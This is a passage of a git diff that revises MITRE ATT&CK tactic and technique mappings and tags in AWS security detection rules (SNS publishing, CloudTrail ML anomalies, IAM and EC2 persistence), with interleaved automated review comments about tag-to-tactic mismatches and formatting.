"https://attack.mitre.org/techniques/T1552/" [[rule.threat.technique.subtechnique]] -id = "T1021.007" -name = "Cloud Services" -reference = "https://attack.mitre.org/techniques/T1021/007/" +id = "T1552.005" +name = "Cloud Instance Metadata API" +reference = "https://attack.mitre.org/techniques/T1552/005/" + + [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = 
"https://attack.mitre.org/tactics/TA0008/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml index 25f18611e04..2cb48308925 100644 --- a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml +++ b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/09" [rule] author = ["Elastic"] @@ -98,7 +98,17 @@ risk_score = 47 rule_id = "2112ecce-cd34-11ef-873f-f661ea17fbcd" setup = "AWS SNS topic data event types need to be enabled in the CloudTrail trail configuration to capture the Publish action. Ensure that the AWS CloudTrail service is [configured](https://docs.aws.amazon.com/sns/latest/dg/logging-using-cloudtrail.html#cloudtrail-data-events) to log data events for SNS." severity = "medium" -tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SNS", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS SNS", + "Use Case: Threat Detection", + "Resources: Investigation Guide", + "Tactic: Lateral Movement", + "Tactic: Exfiltration", + "Tactic: Impact", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -130,16 +140,46 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1534" +name = "Internal Spearphishing" +reference = "https://attack.mitre.org/techniques/T1534/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1496" +name = "Resource Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/" +[[rule.threat.technique.subtechnique]] +id = "T1496.004" +name = "Cloud Service Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/004/" + + + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name", "aws.cloudtrail.resources.arn"] diff --git a/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml b/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml index 4d5ee39cd2f..1fb11e95294 100644 --- a/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml +++ b/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 
@@ -112,3 +112,37 @@ tags = [ ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" + +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml b/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml index 9f64ead7e86..f428b4da9a8 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 
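Review bot: The three `[[rule.threat]]` entries appended after `type = "machine_learning"` declare Discovery, Privilege Escalation and Lateral Movement, but the `tags = [` block the hunk header points at is not part of this diff, so it is worth confirming it already carries `Tactic: Discovery`, `Tactic: Privilege Escalation` and `Tactic: Lateral Movement`; every other rule in this diff pairs each threat tactic with such a tag, and a tactic with no tag breaks that pairing. The Privilege Escalation and Lateral Movement entries consist of a `[rule.threat.tactic]` table only, with no `[[rule.threat.technique]]`, which leaves those tactics without technique-level ATT&CK coverage. Both points apply to the six entries added to `ml_cloudtrail_rare_error_code.toml` in the following hunk, five of which are tactic-only.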
@@ -114,3 +114,61 @@ tags = [ ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" + +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml index 7093cd7002b..2634447e6ad 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 
@@ -106,12 +106,24 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "809b70d3-e2c3-455e-af1b-2626a5a1a276" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -122,7 +134,3 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml index 149e4f75951..c961ff23bf9 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 
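Review bot: The rewritten `tags` list drops `"Tactic: Initial Access"` while the threat section below it still maps `TA0001` / `Initial Access` (the `[rule.threat.tactic]` table is only moved ahead of the technique, not removed), so this rule now declares a tactic with no matching tag. The same mismatch appears in `ml_cloudtrail_rare_method_by_country.toml` (next hunk, identical edit) and in `ml_cloudtrail_rare_method_by_user.toml`, whose tags also lose `Tactic: Initial Access` and gain nothing for the new Lateral Movement, Persistence and Exfiltration entries; `persistence_iam_oidc_provider_created.toml` likewise swaps `"Tactic: Privilege Escalation"` for `"Tactic: Persistence"` in its tags but keeps the `TA0004` threat entry. For this file the fix is one line back in the list, `"Tactic: Initial Access",`; the others need a `Tactic:` entry for each tactic their threat section declares.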
@@ -106,12 +106,24 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "dca28dee-c999-400f-b640-50a081cc0fd1" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -122,7 +134,3 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml index e5d2305511a..db71d8487f4 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 75 
@@ -104,12 +104,24 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -120,7 +132,42 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.007" +name = "Cloud Services" +reference = "https://attack.mitre.org/techniques/T1021/007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + 
diff --git a/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml b/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml index f3eb07c91ed..c81083059cd 100644 --- a/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml +++ b/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml @@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/03/23" +updated_date = "2026/02/25" [rule] author = ["Elastic"] @@ -121,21 +121,32 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml index cd06e93a54e..37786c113df 100644 --- a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml +++ b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/06/04" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -63,7 +63,16 @@ references = [ risk_score = 21 rule_id = "39144f38-5284-4f8e-a2ae-e3fd628d90b0" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Use Case: Network Security Monitoring", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -90,18 +99,30 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml index 884d6a0a35b..3e29917bfd5 100644 --- a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml +++ b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/04" [rule] author = ["Elastic", "Austin Songer"] @@ -91,7 +91,15 @@ references = [ risk_score = 21 rule_id = "e7cd5982-17c8-4959-874c-633acde7d426" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Use Case: Network Security Monitoring", + "Resources: Investigation Guide", + "Tactic: Persistence", +] timestamp_override = "event.ingested" type = "new_terms" @@ -128,20 +136,11 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" - -[[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml index 239f05267be..fd04f7d979e 100644 --- a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml +++ b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml 
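Review bot: The threat hunk of `persistence_ec2_route_table_modified_or_deleted.toml` removes the rule's only technique mapping (`T1578` / `T1578.005`) together with the Defense Evasion tactic and leaves a `[[rule.threat]]` entry containing nothing but `[rule.threat.tactic]` `TA0003` / `Persistence`, so the rule drops out of technique-level ATT&CK coverage entirely. If the move to Persistence is intended, the entry should name the technique the detection actually observes; if dropping the technique was unintentional, note that `T1578` is a Defense Evasion technique in ATT&CK, so restoring it means keeping a Defense Evasion entry alongside the new tactic. The tactic-only Persistence entry added in the next file, `persistence_ec2_security_group_configuration_change_detection.toml`, has the same gap.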
@@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic", "Austin Songer"] @@ -71,7 +71,16 @@ references = ["https://docs.aws.amazon.com/AWSEC2/latest/WindowsGuide/ec2-securi risk_score = 21 rule_id = "29052c19-ff3e-42fd-8363-7be14d7c5469" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Use Case: Network Security Monitoring", + "Resources: Investigation Guide", + "Tactic: Persistence", + "Tactic: Defense Evasion" +] timestamp_override = "event.ingested" type = "query" @@ -108,17 +117,25 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml index 7e081c3c90a..dde1ff0a43d 100644 --- a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml +++ b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml 
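Review bot: The rewritten `tags` list in the security-group rule ends with `"Tactic: Defense Evasion"` and no trailing comma, whereas every other multi-line `tags` list in this diff closes its last element with one; writing `"Tactic: Defense Evasion",` keeps the lists uniform and avoids a two-line diff the next time a tag is appended. Separately, the added threat entries place `[rule.threat.tactic]` before `[[rule.threat.technique]]` in the `ml_cloudtrail_*` files and after it everywhere else, and several hunks insert two or three consecutive blank `+` lines ahead of `[rule.threat.tactic]` (this file, `persistence_iam_oidc_provider_created.toml`, `lateral_movement_ec2_instance_console_login.toml`, the SNS and MFA rules). All of it is valid TOML, but if the repository's rule formatter normalizes section order and spacing, running it over these files would keep them from being rewritten by the next unrelated change.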
@@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/03/23" +updated_date = "2026/02/25" [rule] author = ["Elastic"] @@ -107,7 +107,17 @@ references = ["https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/"] risk_score = 21 rule_id = "c70d9f0d-8cb6-4cfc-85df-a95c1ccf4eab" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS CloudTrail", "Data Source: AWS IAM", "Data Source: AWS STS", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS CloudTrail", + "Data Source: AWS IAM", + "Data Source: AWS STS", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -125,21 +135,17 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml b/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml index 6e4d05f7250..829f6ade70b 100644 
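Review bot: The new `tags` list for `persistence_iam_api_calls_via_user_session_token.toml` adds `"Tactic: Privilege Escalation"`, but the threat hunk further down leaves the file with a single `[[rule.threat]]` entry mapping `TA0003` / `Persistence` via `T1098`, immediately followed by `[rule.investigation_fields]`, so that tag has no corresponding tactic unless another threat entry exists outside the hunk. Either drop the tag or add a second `[[rule.threat]]` entry with a `[rule.threat.tactic]` of `id = "TA0004"`, `name = "Privilege Escalation"` and the matching reference, the way `initial_access_console_login_root.toml` does at the top of this diff. Reviewing which of the two reflects what the `new_terms` query actually observes is the real decision here; the tag-only change just leaves the rule inconsistent.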
--- a/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml +++ b/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/02" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -143,18 +143,24 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/aws/persistence_iam_group_creation.toml b/rules/integrations/aws/persistence_iam_group_creation.toml index 900293ee8de..1eb39e9cb91 100644 --- a/rules/integrations/aws/persistence_iam_group_creation.toml +++ b/rules/integrations/aws/persistence_iam_group_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] 
@@ -98,16 +98,22 @@ event.dataset: aws.cloudtrail and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" +[[rule.threat.technique.subtechnique]] +id = "T1136.003" +name = "Cloud Account" +reference = "https://attack.mitre.org/techniques/T1136/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml index 6fde2381297..16c89c35694 100644 --- a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml +++ b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -98,7 +98,15 @@ references = [ risk_score = 47 rule_id = "47403d72-3ee2-4752-a676-19dc8ff2b9d6" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -112,21 +120,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" - [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml b/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml index 4e17091a11c..cc0704696b8 100644 --- a/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml +++ b/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] 
@@ -115,7 +115,15 @@ references = [ risk_score = 21 rule_id = "1d4ca9c0-ff1e-11ee-91cc-f661ea17fbce" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -129,39 +137,22 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = 